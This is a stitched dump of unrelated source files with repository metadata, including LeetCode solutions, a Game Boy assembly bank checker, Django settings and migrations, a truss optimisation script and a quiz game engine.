        'universe': int(universe)
    }
def prepare_datasets():
    """Convert every datasets/*.h5 file and write summary metadata.

    For each .h5 file a directory named after the dataset is created (the
    script aborts with exit(1) if it already exists) and convert() fills it.
    Afterwards the collected DATASET_INFO is dumped to datasets_info.json and
    to a '%'-separated dataset_info.txt sorted by (n, dimension).
    """
    ddir = os.path.join(CUR_PATH, 'datasets')
    for f in os.listdir(ddir):
        if f.endswith('.h5'):
            dsname = get_dsname(f)
            # Refuse to clobber a previous run's output directory.
            if os.path.exists(dsname):
                print("directory already exists")
                exit(1)
            os.makedirs(dsname)
            DATASET_INFO[dsname] = convert(os.path.join(ddir, f), dsname)
    with open('datasets_info.json', 'w') as jf:
        import json
        json.dump(DATASET_INFO, jf, indent=4)
    with open('dataset_info.txt', 'w') as tf:
        # Rows ordered smallest-to-largest by point count, then dimension.
        for ds in sorted(DATASET_INFO.keys(), key=lambda k: (DATASET_INFO[k]['n'], DATASET_INFO[k]['dimension'])):
            info = DATASET_INFO[ds]
            trainb = info['train-b']
            testb = info['test-b']
            traint = info['train-t']
            testt = info['test-t']
            n = info['n']
            dim = info['dimension']
            qn = info['qn']
            dsh5 = info['dsh5']
            universe = info['universe']
            tf.write(f"{ds}%{trainb}%{testb}%{traint}%{testt}%{n}%{dim}%{qn}%{dsh5}%{universe}\n")
# Disabled click-based CLI kept for reference; the script currently runs
# prepare_datasets() unconditionally when executed directly.
# CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
# @click.command(context_settings=CONTEXT_SETTINGS)
# @click.option('--no-large', default=True)
# def prepare(no_large):
#     """Prepare datasets."""
#     prepare_datasets()
#     if not no_large:
#         prepare_large_datasets()
if __name__ == '__main__':
    prepare_datasets()
| [
"harrywhy12@gmail.com"
] | harrywhy12@gmail.com |
be0a4b0ae23f12893b303e8bc4cb504c7f517d0f | d0f11aa36b8c594a09aa06ff15080d508e2f294c | /leecode/1-500/1-100/39-组合总和.py | 751f2a332ffc2b86704c60a28303c9b7f6961e04 | [] | no_license | saycmily/vtk-and-python | 153c1fe9953fce685903f938e174d3719eada0f5 | 5045d7c44a5af5c16df5a3b72c157e9a2928a563 | refs/heads/master | 2023-01-28T14:02:59.970115 | 2021-04-28T09:03:32 | 2021-04-28T09:03:32 | 161,468,316 | 1 | 1 | null | 2023-01-12T05:59:39 | 2018-12-12T10:00:08 | Python | UTF-8 | Python | false | false | 572 | py | class Solution:
def combinationSum(self, candidates, target: int):
candidates.sort()
n = len(candidates)
res = []
def backtrack(tmp, tmp_sum=0, first=0):
if tmp_sum == target:
res.append(tmp.copy())
return
for j in range(first, n):
if tmp_sum + candidates[j] > target:
break
tmp.append(candidates[j])
backtrack(tmp, tmp_sum + candidates[j], j)
tmp.pop()
backtrack([])
return res
| [
"1786386686@qq.com"
] | 1786386686@qq.com |
652a4739f30fdafd785d25a2e440d57ef40fa1f3 | 163092f9f50bddb171da191958aa7866180a6fee | /utils/farcheck.py | c7cee57a384f95a9e21d9989ec148ace6f093e8c | [] | no_license | NekrobaDA/polishedcrystal | d7dd18f32886ee30a4c764c4ba78242f902f6aca | 6303b29258b72c19faa72e23d3380220d1d12daa | refs/heads/master | 2023-04-01T13:15:54.756614 | 2021-03-20T14:16:45 | 2021-03-20T14:16:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,250 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from glob import iglob
import sys
import re
# A .sym line looks like 'BB:AAAA LabelName' (2 hex digits of bank, 4 hex
# digits of address); capture groups: bank, address, label.
sym_rx = re.compile(r'^([0-9A-F]{2}):([0-9A-F]{4}) ([A-Z0-9_\.#@]+)', re.IGNORECASE)
# A label definition in .asm source: 'Name:' (macro definitions excluded).
def_rx = re.compile(r'^\s*([A-Z_][A-Z0-9_\.#@]*):(?!\s*macro)', re.IGNORECASE)
# Near calls/jumps/pointer words (optionally conditional); these require the
# target to be reachable without a bank switch.
ref_rx = re.compile(r'^\s+(?:call|jp|jr|dw|dwb)\s+(?:(?:z|nz|c|nc)\s*,\s*)?([A-Z0-9_\.]+)', re.IGNORECASE)
# Banked ("far") call/jump macros, which are unnecessary for in-bank targets.
far_rx = re.compile(r'^\s+(?:farcall|farjp|callfar|callba|callab)\s+([A-Z0-9_\.]+)', re.IGNORECASE)
# Labels starting v/s/w/h + capital (RAM-section naming) are not bank-checked.
ram_rx = re.compile(r'^[vswh][A-Z]')
# A ';' comment containing this token suppresses the cross-bank warning.
suppress = 'far-ok'
# Files deliberately skipped by the scan.
exclude = {
    'data/text/unused_sweet_honey.asm',
    'engine/games/memory_game.asm',
    'gfx/pokemon/frame_pointers.asm',
    'ram/wram0.asm',
    'ram/wramx.asm',
}
if len(sys.argv) != 2:
    print(f'Usage: {sys.argv[0]} polishedcrystal.sym', file=sys.stderr)
    exit(1)
# label -> ROM bank number, parsed from the linker-generated .sym file.
sym_banks = {}
with open(sys.argv[1], 'r') as f:
    for line in f:
        if (m := re.match(sym_rx, line)):
            bank, addr, label = m.groups()
            sym_banks[label] = int(bank, 16)
def get_label_bank(m, n=1):
    """Resolve regex match group ``n`` to ``(full_label, bank_or_None)``.

    Local labels (starting with '.') are qualified with the enclosing global
    label tracked in the module-level ``cur_label`` before looking the full
    name up in ``sym_banks``.
    """
    label = m.group(n)
    if label.startswith('.') and cur_label is not None:
        label = cur_label + label
    bank = sym_banks.get(label, None)
    return (label, bank)
# Scan every .asm file, tracking the current global label and its bank, and
# report (a) near calls/jumps whose target lives in a different bank and
# (b) far calls/jumps whose target is already in the current bank.
# NOTE(review): the reports print the literal string "(unknown)" where a file
# name would normally appear -- it looks like {filename} was dropped from the
# f-strings; confirm before relying on the output.
for filename in iglob('**/*.asm', recursive=True):
    if filename in exclude:
        continue
    cur_label = None  # last global label seen (qualifies '.local' references)
    cur_bank = None  # bank that label lives in, per the .sym file
    with open(filename, 'r') as f:
        for i, line in enumerate(f, 1):
            if (m := re.match(def_rx, line)):
                # New label definition: update the current label/bank context.
                label, bank = get_label_bank(m)
                cur_label = label
                if bank is not None:
                    cur_bank = bank
                else:
                    print(f"(unknown):{i}: cannot get bank of '{label}'", file=sys.stderr)
            elif (m := re.match(ref_rx, line)):
                # Near reference: flag targets in a different, non-zero bank,
                # unless the label is a RAM symbol or the line carries the
                # 'far-ok' suppression comment.
                label, bank = get_label_bank(m)
                if bank is not None and bank != cur_bank and bank != 0 and not re.match(ram_rx, label):
                    code, *comment = line.split(';', 1)
                    code = code.strip()
                    comment = comment[0].strip() if comment else ''
                    if suppress not in comment:
                        print(f"(unknown):{i}: '{code}' in bank {cur_bank:02X} references '{label}' in bank {bank:02X}")
            elif (m := re.match(far_rx, line)):
                # Far call/jump to a same-bank target: a near call would do.
                label, bank = get_label_bank(m)
                if bank is not None and bank == cur_bank:
                    code = line.split(';', 1)[0].strip()
                    print(f"(unknown):{i}: '{code}' in bank {cur_bank:02X} references '{label}' already in bank {bank:02X}")
"remy.oukaour+rangi42@gmail.com"
] | remy.oukaour+rangi42@gmail.com |
eb64e5d68a519e53d4e37ab1f2670f115f660766 | f02b21d5072cb66af643a7070cf0df4401229d6e | /leetcode/depth_first_search/695-max_area_of_island.py | 939a2da8c3ed73d926cf1e1b3a4173e9f7dc2bbb | [] | no_license | dbconfession78/interview_prep | af75699f191d47be1239d7f842456c68c92b95db | 7f9572fc6e72bcd3ef1a22b08db099e1d21a1943 | refs/heads/master | 2018-10-09T22:03:55.283172 | 2018-06-23T01:18:00 | 2018-06-23T01:18:00 | 110,733,251 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,673 | py | import sys
class Solution:
    """LeetCode 695: area of the largest 4-connected region of 1s.

    Both entry points flood-fill destructively, zeroing every visited cell
    of ``grid`` as they count it.
    """
    def maxAreaOfIsland(self, grid):
        """Return the area of the biggest island (0 when there is none)."""
        best = 0
        for row_idx, row in enumerate(grid):
            for col_idx, cell in enumerate(row):
                if cell == 1:
                    best = max(best, self.helper(grid, row_idx, col_idx, 0))
        return best
    def helper(self, grid, i, j, area):
        """Accumulator-style DFS: add the island containing (i, j) to ``area``."""
        out_of_bounds = i < 0 or j < 0 or i >= len(grid) or j >= len(grid[i])
        if out_of_bounds or grid[i][j] == 0:
            return area
        grid[i][j] = 0  # sink the cell so it is never counted twice
        area += 1
        for di, dj in ((0, 1), (1, 0), (0, -1), (-1, 0)):
            area = self.helper(grid, i + di, j + dj, area)
        return area
    def maxAreaOfIsland_PASSED(self, grid):
        """Earlier accepted variant kept for reference; same contract."""
        best = 0
        for row_idx in range(len(grid)):
            for col_idx in range(len(grid[row_idx])):
                if grid[row_idx][col_idx] == 1:
                    best = max(best, self.explore(grid, row_idx, col_idx))
        return best
    def explore(self, grid, i, j):
        """Return the size of the island containing (i, j), zeroing it as it goes."""
        if i < 0 or i >= len(grid) or j < 0 or j >= len(grid[i]) or grid[i][j] == 0:
            return 0
        grid[i][j] = 0
        total = 1
        for di, dj in ((0, 1), (0, -1), (-1, 0), (1, 0)):
            total += self.explore(grid, i + di, j + dj)
        return total
def print_map(grid):
    """Print ``grid`` one row per line, every cell followed by a space."""
    for row in grid:
        rendered = ''.join('{} '.format(cell) for cell in row)
        print(rendered)
def main():
    """Run maxAreaOfIsland on the sample grids, printing one result per line."""
    sample_grids = [
        # expected: 4
        [[1, 1, 0, 0, 0],
         [1, 1, 0, 0, 0],
         [0, 0, 0, 1, 1],
         [0, 0, 0, 1, 1]],
        # expected: 3
        [[1, 1, 0, 1, 1],
         [1, 0, 0, 0, 0],
         [0, 0, 0, 0, 1],
         [1, 1, 0, 1, 1]],
        # expected: 1
        [[1]],
        # expected: 6 (the 11-cell cluster is not fully 4-connected)
        [[0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0],
         [0, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
         [0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 0],
         [0, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 0],
         [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0],
         [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0],
         [0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0]],
    ]
    for grid in sample_grids:
        print(Solution().maxAreaOfIsland(grid))
# Run the demo only when executed directly, not on import.
if __name__ == '__main__':
    main()
# Instructions
"""
Given a non-empty 2D array grid of 0's and 1's, an island is a group of 1's (representing land) connected 4-directionally (horizontal or vertical.) You may assume all four edges of the grid are surrounded by water.
Find the maximum area of an island in the given 2D array. (If there is no island, the maximum area is 0.)
Example 1:
[[0,0,1,0,0,0,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,1,1,0,1,0,0,0,0,0,0,0,0],
[0,1,0,0,1,1,0,0,1,0,1,0,0],
[0,1,0,0,1,1,0,0,1,1,1,0,0],
[0,0,0,0,0,0,0,0,0,0,1,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,0,0,0,0,0,0,1,1,0,0,0,0]]
Given the above grid, return 6. Note the answer is not 11, because the island must be connected 4-directionally.
Example 2:
[[0,0,0,0,0,0,0,0]]
Given the above grid, return 0.
Note: The length of each dimension in the given grid does not exceed 50.
""" | [
"Hyrenkosa1"
] | Hyrenkosa1 |
962190b9d499ff050a8f359e3e2ee888b8b5e6a6 | 0d6e4a3c482389bbd27dcd5a093e6e3efcb1ebc6 | /WebspamDetect/DataPreprocessAndJudge/TagArrayGenerator.py | e2e403eb707b6af6112ecc6476b8b72a6f624026 | [] | no_license | memjyh/DetectWebSpam | 22a80a614331f89740d7e0b381325dad84de4da0 | a598f2aab4617cdb6bea8e1b8474bf6f314110ca | refs/heads/master | 2020-12-30T09:05:10.175519 | 2020-02-15T10:13:11 | 2020-02-15T10:13:11 | 238,951,625 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,269 | py | # -*- coding: UTF-8 -*-
import os,sys
stdi,stdo,stde=sys.stdin,sys.stdout,sys.stderr
reload(sys)
sys.setdefaultencoding( "utf-8" )
sys.stdin,sys.stdout,sys.stderr=stdi,stdo,stde
parentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0,parentdir)
sys.path.insert(0,parentdir+"/Common")
def Generate(tagtree):
TagEnumFilePath = "../WebspamDetect/DetectModel/Tag.txt"
TagList = []
fo = open(TagEnumFilePath, "r")
while 1:
line = fo.readline()
if not line:
break
TagList.append(line.split("\n")[0].strip())
fo.close()
TagList.remove("")
TagList.remove("")
# TagList.remove("\r")
# TagList.remove("\r")
for t in TagList:
#print t
t=t[:-1]
#print t
#print TagList
TagNumber = len(TagList)
# print TagNumber
TagArray = [0 for n in range(TagNumber)]
tags = tagtree.split("-")
if "" in tags:
tags.remove("")
#print tags
for tag in tags:
if tag not in TagList:
continue
TagArray[TagList.index(tag)]=1
#print len(TagArray)
return TagArray
if __name__ == '__main__':
print len(Generate('a-article-b'))
| [
"543721511@qq.com"
] | 543721511@qq.com |
20801976b690a73e0d2e4df130659798771f135d | 629d9a97a0685b0c7af84f7ae63f13da04f577ed | /shop/migrations/0004_remove_product_stock.py | c7ad57af43ff7885de7cb8ab42c4eea8ad40149b | [] | no_license | vladborisov182/django_shop | e7127092178aee6d78ce7a5921e6b25998492b7c | b92de7ffaef983ccdb52f1573ad9f15ae97db1eb | refs/heads/master | 2021-05-13T12:55:21.428462 | 2020-03-30T09:44:28 | 2020-03-30T09:44:28 | 116,689,519 | 0 | 0 | null | 2020-03-30T09:43:05 | 2018-01-08T14:50:54 | Python | UTF-8 | Python | false | false | 390 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-01-09 16:37
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration for the `shop` app: drops Product.stock.

    NOTE(review): RemoveField permanently discards the column's data once
    applied -- confirm nothing still reads `stock` before deploying.
    """
    dependencies = [
        ('shop', '0003_auto_20180109_1619'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='product',
            name='stock',
        ),
    ]
| [
"vladborisov182@gmail.com"
] | vladborisov182@gmail.com |
99d4068cacbaa6f72d195e6e0a70cb6fa51744c2 | ef055588f88c39ebcef6f8e877cfefe3a8ecc158 | /movieapp/config/settings/base.py | 2ae637d3a2656f2b379393c337a82929904c35ea | [] | no_license | danjac/movieapp | 28dbfaa60e28d0ea8b2f6007e71dacaf5e057acc | 2a41c80fbbc36e838bfa5a7938a2513b0fcdc29c | refs/heads/master | 2023-02-09T02:14:11.063681 | 2020-12-26T11:09:46 | 2020-12-26T11:09:46 | 320,833,342 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,195 | py | # Standard Library
import pathlib
import socket
from email.utils import getaddresses
# Django
from django.contrib import messages
# Third Party Libraries
import environ
env = environ.Env()
DEBUG = False
BASE_DIR = pathlib.Path("/app")
SECRET_KEY = env("SECRET_KEY")
DATABASES = {
"default": env.db(),
}
REDIS_URL = env("REDIS_URL")
CACHES = {"default": env.cache("REDIS_URL")}
EMAIL_HOST = env("EMAIL_HOST", default="localhost")
EMAIL_PORT = env.int("EMAIL_PORT", default=25)
EMAIL_BACKEND = "djcelery_email.backends.CeleryEmailBackend"
ATOMIC_REQUESTS = True
ALLOWED_HOSTS = env.list("ALLOWED_HOSTS", default=[])
# configure internal IPS inside docker container
INTERNAL_IPS = [
ip[:-1] + "1" for ip in socket.gethostbyname_ex(socket.gethostname())[2]
]
ADMINS = getaddresses(env.list("ADMINS", default=[]))
SESSION_COOKIE_DOMAIN = env("SESSION_COOKIE_DOMAIN", default=None)
CSRF_COOKIE_DOMAIN = env("CSRF_COOKIE_DOMAIN", default=None)
CSRF_TRUSTED_ORIGINS = env.list("CSRF_TRUSTED_ORIGINS", default=[])
ROOT_URLCONF = "movieapp.config.urls"
WSGI_APPLICATION = "movieapp.config.wsgi.application"
LOCAL_APPS = [
"movieapp.actors.apps.ActorsConfig",
"movieapp.movies.apps.MoviesConfig",
"movieapp.tv_shows.apps.TvShowsConfig",
"movieapp.users.apps.UsersConfig",
]
INSTALLED_APPS = [
"django.forms",
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.sites",
"django.contrib.messages",
"django.contrib.postgres",
"django.contrib.staticfiles",
"allauth",
"allauth.account",
"allauth.socialaccount",
"allauth.socialaccount.providers.google",
"django_extensions",
"djcelery_email",
"widget_tweaks",
] + LOCAL_APPS
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sites.middleware.CurrentSiteMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.locale.LocaleMiddleware",
"movieapp.common.middleware.turbolinks.TurbolinksMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.middleware.gzip.GZipMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"movieapp.common.middleware.http.HttpResponseNotAllowedMiddleware",
]
DEFAULT_PAGE_SIZE = 12
# base Django admin URL (should be something obscure in production)
ADMIN_URL = env("ADMIN_URL", default="admin/")
# auth
AUTH_USER_MODEL = "users.User"
# https://docs.djangoproject.com/en/dev/ref/settings/#authentication-backends
AUTHENTICATION_BACKENDS = [
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
]
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator" # noqa
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
HOME_URL = LOGIN_REDIRECT_URL = "/"
LOGIN_URL = "account_login"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = "username_email"
SOCIALACCOUNT_PROVIDERS = {
"google": {
"SCOPE": ["profile", "email",],
"AUTH_PARAMS": {"access_type": "online",},
}
}
SOCIALACCOUNT_ADAPTER = "movieapp.users.adapters.SocialAccountAdapter"
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = "en"
LANGUAGES = [
("en", "English (US)"),
("en-gb", "English (GB)"),
]
LANGUAGE_COOKIE_DOMAIN = env("LANGUAGE_COOKIE_DOMAIN", default=None)
LANGUAGE_COOKIE_SAMESITE = "Lax"
LOCALE_PATHS = [BASE_DIR / "i18n"]
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# https://docs.djangoproject.com/en/1.11/ref/forms/renderers/
FORM_RENDERER = "django.forms.renderers.TemplatesSetting"
# https://docs.djangoproject.com/en/3.0/ref/contrib/messages/
MESSAGE_TAGS = {
messages.DEBUG: "message-debug",
messages.INFO: "message-info",
messages.SUCCESS: "message-success",
messages.WARNING: "message-warning",
messages.ERROR: "message-error",
}
# https://celery.readthedocs.io/en/latest/userguide/configuration.html
result_backend = CELERY_BROKER_URL = REDIS_URL
result_serializer = "json"
# https://django-taggit.readthedocs.io/en/latest/getting_started.html
MEDIA_URL = env("MEDIA_URL", default="/media/")
STATIC_URL = env("STATIC_URL", default="/static/")
MEDIA_ROOT = BASE_DIR / "media"
STATICFILES_DIRS = [BASE_DIR / "static"]
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [BASE_DIR / "templates"],
"APP_DIRS": True,
"OPTIONS": {
"debug": False,
"builtins": [],
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.i18n",
"django.template.context_processors.media",
"django.template.context_processors.static",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages",
],
"libraries": {"pagination": "movieapp.common.pagination.templatetags"},
},
}
]
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"handlers": {
"console": {"class": "logging.StreamHandler"},
"null": {"level": "DEBUG", "class": "logging.NullHandler"},
},
"loggers": {
"root": {"handlers": ["console"], "level": "INFO"},
"django.security.DisallowedHost": {"handlers": ["null"], "propagate": False},
"django.request": {"handlers": ["console"], "level": "ERROR"},
},
}
TMDB_API_TOKEN = env("TMDB_API_TOKEN")
| [
"danjac2018@gmail.com"
] | danjac2018@gmail.com |
e741f7a488bff74efe84240a5e4692abe1917623 | 3caf59afaee9fa1728771ea6f0a1dc2c745e4106 | /ex38.py | d0cb8ba61ad467311a915b7f5bdd06c4b131615a | [
"MIT"
] | permissive | KhinYadanaThein/python-exercises | e717bd2a4ebcefc70ca4cb6a793a18784e9c02af | 0df54fac879b2cdffe0b3c47539203780bb96202 | refs/heads/master | 2020-03-19T08:02:29.984118 | 2018-06-26T07:35:38 | 2018-06-26T07:35:38 | 136,170,431 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | ten_things = "Apples Oranges Crows Telephone Light Sugar"
print("Wait there are not 10 things in that list. Let's fix that.")
stuff = ten_things.split(' ')
more_stuff = ["Day", "Night", "Song", "Frisbee",
"Corn", "Banana", "Girl", "Boy"]
while len(stuff) != 10:
next_one = more_stuff.pop()
print("Adding: ", next_one)
stuff.append(next_one)
print(f"There are {len(stuff)} items now.")
print("There we go : ",stuff)
print("Let's do some things with stuff.")
print(stuff[1])
print(stuff[-1])
print(stuff.pop())
print(' '.join(stuff))
print('#'.join(stuff[3:5]))
| [
"angelchit35@gmail.com"
] | angelchit35@gmail.com |
cbada4cfa619707cbcc95167d3cfe9efdcc9ce8c | 6caa876033cb8059f42db6dd4505a10a4745509a | /brain_games/engine.py | 6aa4675fb3e95168b7abfca9783c9f7f0dc2b51e | [
"MIT"
] | permissive | vetalpaprotsky/brain-games | 5d066a35054956761119b4f8465fdd6b7cc7b808 | 42136c6d32931ff25f92dbb3b11d890746b85d1c | refs/heads/master | 2023-01-09T20:56:26.245825 | 2020-11-14T16:16:57 | 2020-11-14T16:16:57 | 275,587,849 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,010 | py | from brain_games import cli
import prompt
def ask_question_to_user(question):
print('Question: {}'.format(question))
return prompt.string('Your answer: ').strip().lower()
def play_game_loop(game, user_name):
ANSWERS_TO_WIN_COUNT = 3
correct_answers_count = 0
while correct_answers_count < ANSWERS_TO_WIN_COUNT:
question, correct_answer = game.get_question_and_correct_answer()
user_answer = ask_question_to_user(question)
if user_answer == str(correct_answer):
correct_answers_count += 1
print('Correct!')
else:
print("'{}' is wrong answer ;(. Correct answer was '{}'".format(
user_answer, correct_answer
))
print("Let's try again, {}!".format(user_name))
print('Congratulations, {}!'.format(user_name))
def play(game):
cli.show_greeting_message()
print(game.DESCRIPTION, '\n')
user_name = cli.welcome_user()
print()
play_game_loop(game, user_name)
| [
"vetalpaprotsky@gmail.com"
] | vetalpaprotsky@gmail.com |
b5192c6662f687528248a77860aafc8d46c56afb | a8ce1de3d85c54310d021a6b170b34aeaa56a2ad | /Subtruss Optimisation 5 (member type-n).py | 9b9da441257e917f38f9e3063d619f773afbb417 | [] | no_license | sskii/DP3-Utilities | 4da7cd9a639249d0bede1a174f5b83d9d2586a0e | cf85ff2b516be8d2acee003a73a5335b2e7537f7 | refs/heads/main | 2023-05-04T23:20:26.496009 | 2021-05-22T05:57:03 | 2021-05-22T05:57:03 | 368,024,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,504 | py |
# EXPERIMENTAL CODE ONLY!!!
# this is essentially Optimisation 1 but I'm trying to port it to spit out data for member type-n instead.
# Interactive script: for each candidate triangle count it sweeps theta upward
# until (sin θ)(cos θ)^2 exceeds the load-derived RHS, then reports member
# lengths and subtruss capacity.
import math
print("\nTHIS CODE IS EXPERIMENTAL. Do NOT use it for calculations without manual verification!")
stLength = float(input("Please input subtruss length in mm:\f")) # Subtruss length, mm
#nTriangles = [int(input("Please input the number of triangles:\f"))] # Subtruss section count, ul
nTriangles = [2, 4, 6, 8] # array of possibilities to try
outputBuffer = "" # output buffer so that all the useful stuff gets printed last
# We need to find the first value of theta that satisfies the following:
# (sinθ)(cosθ)^2 = (115 stLength^2) / (k nTriangles^2)
# member compression multipliers
multipliers = [1, 8, ]  # NOTE(review): unused -- presumably meant to drive `k` below; confirm
k = (200) * ((60) ** 2) # compression constant
k *= 8 # because compression members are type 2
phi = 0.8 # reduction factor
DP = int(input("Please input desired answer precision in DP:\f")) # decimal answer precision in DP
thetaStep = math.radians(10 ** (-1 * DP)) # because python works in radians!
print("Stepping", thetaStep, "radians per iteration.")
# METHOD #
# We will first evaluate the RHS of the expression. Then we'll evaluate values of theta from zero
# until the LHS is greater than the RHS, at which point we return theta.
print("\n* * *\n")
for n in nTriangles:
    print("Beginning evaluation of", n, "triangles.")
    RHS = (115 * (stLength ** 2)) / (k * (n ** 2))
    #print("RHS =", RHS)
    theta = 0 # test theta
    run = True # flag
    while run:
        if theta > math.radians(90):
            # inputs are invalid somehow -- theta swept past 90 deg with no crossing
            print("No solutions found; add more triangles.")
            # report this
            outputBuffer += str(n)
            outputBuffer += "          (No valid solutions)\n"
            run = False
        LHS = (math.sin(theta)) * ((math.cos(theta)) ** 2)
        #print("LHS =", LHS, "   when θ =", math.degrees(theta))
        if LHS > RHS:
            #solution found
            print("Solution found. θ =", round(math.degrees(theta), DP))
            # calc expected subtruss capacity
            stMaxCompLoad = (2 * k * phi * (math.cos(theta) ** 3) * (n ** 2)) / (stLength ** 2)
            stMaxTensLoad = (230 * phi) / (math.tan(theta))
            # calc member lengths
            diagLength = (stLength) / (n * math.cos(theta))
            vertLength = (2 * stLength * math.tan(theta)) / (n)
            # print to console
            print("Diagonal members measure", diagLength, "mm and allow truss to support", stMaxCompLoad, "N.")
            print("Vertical members measure", vertLength, "mm and allow truss to support", stMaxTensLoad, "N.")
            # write the solutions out
            outputBuffer += str(n)
            outputBuffer += "          "
            outputBuffer += str(round(math.degrees(theta), DP))
            outputBuffer += "          ("
            outputBuffer += (str(round(stMaxCompLoad, 2)) + ", " + str(round(stMaxTensLoad, 2)))
            outputBuffer += ")          ("
            outputBuffer += (str(round(diagLength, 2)) + ", " + str(round(vertLength, 2)))
            outputBuffer += ")\n"
            run = False
        else:
            #no solution found
            theta += thetaStep # increment theta
    print("Finished evaluating for", n, "triangles.\n")
#done
print("* * *\n\nExecution finished!")
print("Solutions for", stLength, "mm subtruss:\n\nTriangles:          Half of enclosed angle:          Capacity (diags, verts)^          Length (diags, verts)")
print(outputBuffer)
print("^ Calculated capacity is valid for subtruss loading under compression assuming all constituent members are type-1. Values given in newtons. Take the lower of the two.")
print("^ Calculated capacity is valid for subtruss loading under compression assuming all constituent members are type-1. Values given in newtons. Take the lower of the two.") | [
"30613658+sskii@users.noreply.github.com"
] | 30613658+sskii@users.noreply.github.com |
751b86162060e58181694cc6ac5e6f1e99006534 | e79614940fa7bc6973b823421839a8dc7b5491c7 | /testchild.py | 75a2646781c3095a2a342fd6417f3e57c9d6055e | [] | no_license | HarishsGit/IBMTestRepo | 1c2dc701b7ad0d63af29e2326310f793f85ccd96 | 3907cd7c8945033b566aecd5dd3967336067f6c1 | refs/heads/main | 2023-04-08T21:36:11.971177 | 2021-04-20T19:59:30 | 2021-04-20T19:59:30 | 359,679,751 | 0 | 0 | null | 2021-04-20T19:59:31 | 2021-04-20T04:07:27 | Python | UTF-8 | Python | false | false | 65 | py | ### Adding new File to Child Branch
print("Inside Child Branch")
| [
"noreply@github.com"
] | HarishsGit.noreply@github.com |
e48c0ad44f4e4374d39d4bfcd592ab094d217514 | c4bfbffb8c5c0fc22fe749440bc434e155f4130d | /posts/migrations/0001_initial.py | d1521b9bdb9e00c40796f4a937c83440a1c72bf5 | [] | no_license | sunil-ks/mb-app | d77e24c30522884fd9228db13144414c3bd8560e | d99388580a0d5bc031f45b56915ec1471807eac2 | refs/heads/master | 2023-02-12T01:50:23.708915 | 2021-01-16T09:39:55 | 2021-01-16T09:39:55 | 330,127,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 468 | py | # Generated by Django 3.0 on 2021-01-16 06:59
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the ``Post`` model (auto id + free text)."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('text', models.TextField()),
            ],
        ),
    ]
| [
"sunil.ks@codemonk.in"
] | sunil.ks@codemonk.in |
f06041b50819619886d0638a49e9127cfa5c1ad5 | a9742ec68a558d8c1e959ba3f55d2f5bbdaaaa67 | /HTSeqMerger.py | 8db5c6a212dced203176468d27c44793ebea5ac2 | [] | no_license | Joenetics/N.Crassa_25-28C | bc4521bd1058a0ed35513a8e316e32ca6835ff03 | 37426b517290ea85e86c6249556e501aec1fcd89 | refs/heads/master | 2021-01-23T10:04:56.504370 | 2017-09-06T12:44:58 | 2017-09-06T12:44:58 | 102,604,797 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,539 | py | #Open a number of HTSeqFiles, then merge their counts per gene; this is for RStudio packages that require merged CSVs.
# Merge 40 HTSeq-count files (samples MV01..MV20, replicates rep01/rep02)
# into one tab-separated table, one column per file, for R packages that
# require a merged count matrix.
#
# The original opened all 40 files as individually named variables; the
# file names follow a strict MV{nn}_rep{nn} pattern, so build the handle
# list with a loop instead (same files, same column order).
